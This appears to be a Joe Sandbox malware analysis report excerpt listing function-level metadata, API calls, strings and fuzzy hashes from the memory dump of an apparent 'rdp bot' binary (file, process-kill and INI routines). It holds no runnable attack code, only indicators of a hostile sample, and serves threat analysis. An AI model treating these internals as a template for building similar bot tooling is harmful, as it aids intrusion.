    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strlen$CreateDirectoryErrorLast$strcpy
    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
    • API String ID: 1104438493-1059260517
    • Opcode ID: bdbd2f3d48ca3bfda7a2ab80e5ee397aeca65cf24444975c7d8aa5d157a93beb
    • Instruction ID: 0344cdbd7d27ed69c63a879da43b456326921069170823eb33592504cee4242b
    • Opcode Fuzzy Hash: bdbd2f3d48ca3bfda7a2ab80e5ee397aeca65cf24444975c7d8aa5d157a93beb
    • Instruction Fuzzy Hash: 4971B21DE0CB43B2FB207B05E9867B9D260AF68785FD405B2C94E476D1DE2CE845B321
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
    • API String ID: 1879646588-710610406
    • Opcode ID: 0978e53b86eb1b34fd0641683b28ddc7cc1f42a78fcee23864b8b3086e17b44f
    • Instruction ID: 5a0f33e3d4e864ab3b9e001fbf29a0b35f8ca4c58983f19e7cb89be2bf1a917a
    • Opcode Fuzzy Hash: 0978e53b86eb1b34fd0641683b28ddc7cc1f42a78fcee23864b8b3086e17b44f
    • Instruction Fuzzy Hash: 48817F6EF8C617F1FB31BB1594422B8D260AF00794F9506F2CC5E57A94DEACEC41A361
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: AttributesErrorFileLast
    • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
    • API String ID: 1799206407-3397184676
    • Opcode ID: 8acf1c4a5003d6893745fb25f49fd85cb21f8b19960d362f1fb10e72bd5083e8
    • Instruction ID: f52af233dc1083388771b6c7ac8766447fcc5c85953459040687b056c258b514
    • Opcode Fuzzy Hash: 8acf1c4a5003d6893745fb25f49fd85cb21f8b19960d362f1fb10e72bd5083e8
    • Instruction Fuzzy Hash: 9E51A2ACD8C707B5F6307B02A4823B8E2617F04B94FD107B2C99E06994EEADE545F321
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
    • API String ID: 1721699506-2819899730
    • Opcode ID: 6a491c82d6aa7b12143681e80979905013fa0238c388d3680cd4c7a609efb755
    • Instruction ID: cb139502b787aaa19763ca4166180d69d2f790bfdd53f53e8e7c9694455666fd
    • Opcode Fuzzy Hash: 6a491c82d6aa7b12143681e80979905013fa0238c388d3680cd4c7a609efb755
    • Instruction Fuzzy Hash: 0761AF2EE0CA47B1FE60BB01E8423B8A261AF54748FD855B2D54E47690DF3DE942B324
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strlen
    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
    • API String ID: 39653677-3302659514
    • Opcode ID: 22bc61e86a1493e8ad50fc23e1b8a3a56546f4b7d4cc11331462ee5137d2d567
    • Instruction ID: 47f3f9e2a3144ecbf80f51ac2f11efd02bdaa488b16f59840dafb8a319d00da7
    • Opcode Fuzzy Hash: 22bc61e86a1493e8ad50fc23e1b8a3a56546f4b7d4cc11331462ee5137d2d567
    • Instruction Fuzzy Hash: 4741716990DA43A1FE64BF51A4423F4E272BF50784FD846B2D58E0B695DF3CE506A320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Heap$Processstrlen$AllocFree
    • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
    • API String ID: 1318626975-3964590784
    • Opcode ID: 03fc47f102cfa2f258c5c13787973959b3ce9fc44d5bdba8ab39c8666eb55642
    • Instruction ID: ab21ff44bf0f9e828d06251d4d3d99e82a765d61a52e8436e468905bce527251
    • Opcode Fuzzy Hash: 03fc47f102cfa2f258c5c13787973959b3ce9fc44d5bdba8ab39c8666eb55642
    • Instruction Fuzzy Hash: 6B317329A0CB47A6FA61BF52E8063F5E760AF40B84FD801B1D98D07695DF7CE805A360
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: AttributesFile$ErrorLast
    • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
    • API String ID: 365566950-3085771803
    • Opcode ID: b0c5002e8470a0b69f71e521630f808112feeb633aed8e2ce3caca7a6ec6d69d
    • Instruction ID: d5f870dffa6a2ca6c28e1618419adaae13082a8a3790a4fe3fb3e6f9b2007b63
    • Opcode Fuzzy Hash: b0c5002e8470a0b69f71e521630f808112feeb633aed8e2ce3caca7a6ec6d69d
    • Instruction Fuzzy Hash: 5151D869A4C707B5F730BB51D4822B9F2B0AF04384FD047B2D99E46A95DEACE844F721
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
    • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
    • API String ID: 497672076-1436771859
    • Opcode ID: fe1f050fa24a5335d086f1362eb8feab9bac3c886b13072f2e9196b0b082f1e9
    • Instruction ID: 0a76060132d84e1c15df1256dffb7ce2e89b1abd70f0b6150752d59c67bcd9cb
    • Opcode Fuzzy Hash: fe1f050fa24a5335d086f1362eb8feab9bac3c886b13072f2e9196b0b082f1e9
    • Instruction Fuzzy Hash: 2841B36AF0CA83F0FEB0B715E452AB8D260AF61798FD402B2C45E076D5DE3CE545A325
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
    • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
    • API String ID: 4155868088-3920367287
    • Opcode ID: 7bcd59ad198253b387941de4e3b697e80dc4259fd0b82a52b92a8f49e780f28c
    • Instruction ID: 77e60f27ec6b41102a9e1162a6d6cbf4ece78cec49da240d4b7868467e2e7c62
    • Opcode Fuzzy Hash: 7bcd59ad198253b387941de4e3b697e80dc4259fd0b82a52b92a8f49e780f28c
    • Instruction Fuzzy Hash: 7931413D649747A1F720BB06E442779A370AB88BC4F8444B1CA8E47395DE3DE945E360
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
    • API String ID: 2776309574-2006444783
    • Opcode ID: e091a9b40aa408c73ba7d42a196dea1f68ce83149365551fa48ab49a88a7c95c
    • Instruction ID: 0761ac4674be1d7973ec28dee03b9c83212958ce73c4a0f9b938eb7be18a55ae
    • Opcode Fuzzy Hash: e091a9b40aa408c73ba7d42a196dea1f68ce83149365551fa48ab49a88a7c95c
    • Instruction Fuzzy Hash: F2315069A08A07A1FF61FB11E9027F4A260BF14789FC459B1D98D476A0EE7CE905E320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorFileLast$CloseCreateHandleSize
    • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
    • API String ID: 3555958901-1687387729
    • Opcode ID: f8086f2b627537b5e95a628dd57272a1ba8f50c60a456c5ecc4f2c71c76c20ae
    • Instruction ID: a2d7bb3865147b5e029c0465b54cc29e1ca605fac8a229409b6fcef00190179a
    • Opcode Fuzzy Hash: f8086f2b627537b5e95a628dd57272a1ba8f50c60a456c5ecc4f2c71c76c20ae
    • Instruction Fuzzy Hash: 6F615E59E0C313A6FA607755A046378E3609F41375FA94AB2C89F9B2D0CE2DEC847672
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorLastObjectSingleWait
    • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
    • API String ID: 1211598281-4195011794
    • Opcode ID: 3afc064e1e3287de95e3787555b8801013cb86f146be8000e5a04a0980a9d250
    • Instruction ID: f9e787678c5bc468648cbf1c37088ac7a8a4dd19e05c7686128951299de2fd17
    • Opcode Fuzzy Hash: 3afc064e1e3287de95e3787555b8801013cb86f146be8000e5a04a0980a9d250
    • Instruction Fuzzy Hash: 7C316D18F8C303A2FB247B54A48237D92609F44304EE966B2C66F46AD1DDDDED85B361
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: File$CloseCreateErrorHandleLastTime
    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
    • API String ID: 2291555494-3647951244
    • Opcode ID: 5898b04b530a3eb72730c06e2ed2310e503f8d4daf76958c07f857f31bedf6ec
    • Instruction ID: 50d5a08a04899b9a9c3a3ce20b8d55abb06cb5b00ccea5fb9a0879579a4fdb83
    • Opcode Fuzzy Hash: 5898b04b530a3eb72730c06e2ed2310e503f8d4daf76958c07f857f31bedf6ec
    • Instruction Fuzzy Hash: 6F518469D0C313A2FB607B11A44A379E360AF047A4F9847B1D95F4B2D8DE3DEC45A361
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: _errno$_strtoui64
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
    • API String ID: 3513630032-2210897324
    • Opcode ID: 297b9f182c8790e678455ce65a3ffe291811cf4302fcd0b67f952994915113c9
    • Instruction ID: 9c6ea72ff9fae387a4b2dc5731afae0071e71a389907c621b25840c191c107aa
    • Opcode Fuzzy Hash: 297b9f182c8790e678455ce65a3ffe291811cf4302fcd0b67f952994915113c9
    • Instruction Fuzzy Hash: 85219E2A608B47A6F361BF55F8427AAB760FB44784F844172EE8C07654DF3DD885E720
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Virtual$ErrorLastProtectQuery
    • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
    • API String ID: 637304234-2693646698
    • Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
    • Instruction ID: d19719a6cb86f214ee64bffd82d350026967935dd52a1fbd527477016b0292db
    • Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
    • Instruction Fuzzy Hash: 70319239B09B03A6FA00BF16E8461A9A7B1EF84B94F848675DD4C47764EE3CE446A350
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: _errno
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
    • API String ID: 2918714741-1991603811
    • Opcode ID: 578be8e4d6cdb864bf008146ecc2aa08e574406641cc047416c54626d1d3f0c7
    • Instruction ID: 9b8c569da72a722f1314daf84e8591c588ce6fa1cf5e85d146e9fe640f14e34b
    • Opcode Fuzzy Hash: 578be8e4d6cdb864bf008146ecc2aa08e574406641cc047416c54626d1d3f0c7
    • Instruction Fuzzy Hash: C0218229A08747A2F721AF12E842BAAB770BF44794F844171EE8C07764DF3CE845E710
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
